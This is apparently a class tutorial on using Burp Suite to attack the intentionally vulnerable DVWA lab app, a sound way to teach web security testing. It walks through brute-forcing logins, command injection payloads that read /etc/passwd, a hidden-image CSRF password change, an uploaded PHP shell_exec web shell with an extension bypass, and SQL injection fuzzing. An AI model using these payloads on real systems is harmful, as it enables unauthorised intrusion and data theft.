Teddy's Burp Suite Tutorial

Download and Setup Burp Suite

Download Burp Suite 1.7 from the following link:
https://portswigger.net/DownloadUpdate.ashx?Product=Free

Once you have downloaded burp, double click on it to run it.
Then go to your browser and edit the network settings to connect to your local proxy and click OK

Go back to burp and click on Proxy tab and Options tab and check the Running box

Click on and select Certificate in DER format and click .

Save the certificate file. We are going to import this certificate into our browser.

Firefox is awesome in that you can change network settings within the scope of the browser and not globally. If you are using a differnt browser like chrome or opera, you will have to change the network settings globally which will vary based on the operating system.

At the browser, navigate to:
Preferences > Advanced > Certificates > View Certificates > Import
Then import the certificate.
Now you are ready to use burp!

Last class we installed DVWA, a vulnerable LAMP based app. We will be using the DVWA we set up from last class. If you had trouble setting up DVWA, you can use the site I have hosted here: https://dvwa-kkatayama.c9users.io/login.php

Go ahead and navigate to your DVWA site, or the one I hosted and login.

username = admin

password = password

In burp click on the Target tab and you will see the site listed. Click on the Proxy tab and the Intercept tab. Click on the Intercept is off button to toggle it on.

Now let’s examine the vulnerbilities of this site as we did last class, but this time using burp!

BURP - BRUTE FORCE

Downlod the top 10 passwords from the 10 million passwords from here: top_10.txt

In burp, make sure that Intercept to ON. Then click on Brute Force link in the DVWA site

When you click on the link, the page will halt and in burp you will see the http request. Burp is proxy based analyzer that allows you to modify the request before being sent. Click on the Forward button to send the current request.

Now login using these values:

username = admin

password = 1234

When you click submit, the request will be captured by burp.
This time, click the Action button and select Send to Intruder

Click on the Intruder tab and click on the Positions tab.
Change the Attack type to Cluster bomb
Click on the button Clear §

Now highlight admin and click the Add § button

And highlight 1234 and click the Add § button

Next, click the Payloads tab.
Click Payload set: 1 and under Payload Options, type in admin and click Add.
Then type in root and click Add.

Now select Payload set: 2
In Payload Options, click the Load button and select the top_10.txt

Now click the Options tab and under Grep - match click the Clear button. Then type in Welcome and click *Add

Click the Start attack button to launch your payload
The response with Welcome checked means “Welcome” is in the response and that should be the correct password

BURP - COMMAND INJECTION

Toggle Intercept to OFF and click on the Command Injection link
Toggle Intercept to ON and type “127.0.0.1” into the IP field and click Submit
In burp, append “%26+lsinto the ip field

%26 = URL_DECODE(‘&’)

Now click the Forward button and observe what happens

Try with other commands

ip=127.0.0.1+%26+set&Submit=Submit

ip=127.0.0.1+%26+cat+/etc/passwd&Submit=Submit

BURP - CSRF

Toggle Intercept to OFF
Click on the CSRF link. Then toggle Intercept back to ON

Enter ‘12345’ as the new password and examine burp.

Capture GET request to produce this link:
https://dvwa-kkatayama.c9users.io/vulnerabilities/csrf/?password_new=12345&password_conf=12345&Change=Change

Or get the victim to access a webpage with this embeded:

<img src="https://dvwa-kkatayama.c9users.io//vulnerabilities/csrf/?password_new=12345&password_conf=12345&Change=Change" width="1" height="1" />

BURP - FILE UPLOAD

Toggle Intercept to OFF
Click on the File Upload link. Then toggle Intercept back to ON

Create a text file called test.php and add the following code:

test.php

<?php
        $output = shell_exec('ls -lart');
        echo "<pre>$output</pre>";

        $cmd = 'set';
        echo "<pre>".shell_exec($cmd)."</pre>";

        $figlet = shell_exec('sudo apt-get install figlet');
        echo "<pre>$figlet</pre>";

        $hello = shell_exec('figlet Hello Terminal  Are we root ???');
        echo "<pre>$hello</pre>";
    ?>

Rename test.php to test.php.jepg
(This should alows this attack to work on medium and high security levels)

Click Browse… and select the test.php.jpeg file you created
Click Upload

In Burp, delete ‘.jpeg’ from the filename

Now click Forward

Next toggle Intercept to OFF

copy the upload link and merge it with your current URL

old_url = https://dvwa-kkatayama.c9users.io/vulnerabilities/upload/

new_url = https://dvwa-kkatayama.c9users.io/hackable/uploads/test.php

Navigate to your newly crafted link!

If successful, ls and set info will print, figlet will be installed on the server, and then the installed program will execute

BURP SQL INJECTION

Download the SQL.txt from here: SQL.txt

Toggle Intercept to OFF
Click on the SQL Injection link. Then toggle Intercept back to ON

Enter 1 into UserID and click Submit

In burp, click Action and select Send to Intruder
Click the Intruder tab and then the Positions tab.
Leave Attack type to Sniper
Click Clear § button and highlight ‘1’ from the id field and click Add §

Click Payloads tab and click Load … to load the SQL.txt file you downloaded

Now click Start Attack

This will take several seconds since we are using the free version.
In the meantime, toggle Intercept to OFF

When all 125 requests have completed, sort the results by Length

Double click on the largest payload response see more details.

Now click on the Response tab and then the Render tab to see the results.

To verify, you can copy and paste the Payload delivered into the id field of your DVWA site